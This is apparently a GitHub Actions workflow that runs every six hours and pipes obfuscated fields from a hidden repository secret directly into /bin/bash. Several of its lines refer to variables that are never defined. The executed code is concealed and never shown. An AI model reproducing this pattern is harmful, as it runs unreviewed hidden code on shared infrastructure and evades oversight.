name: saoshounong

on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: saoshounong
        env:
          ijuxf56891: ${{ secrets.ijuxf56891 }}
        run: |
          echo $ijuxf56891 | jq -r .blb56007 | /bin/bash
          echo $ntlxj1 | jq -r .jl3 | /bin/bash
          echo $n9 | jq -r .ahh84 | /bin/bash
          echo $it59 | jq -r .slwpe37805 | /bin/bash
          echo $h81 | jq -r .vnaia88 | /bin/bash
          echo $tug06 | jq -r .ydzq2444 | /bin/bash

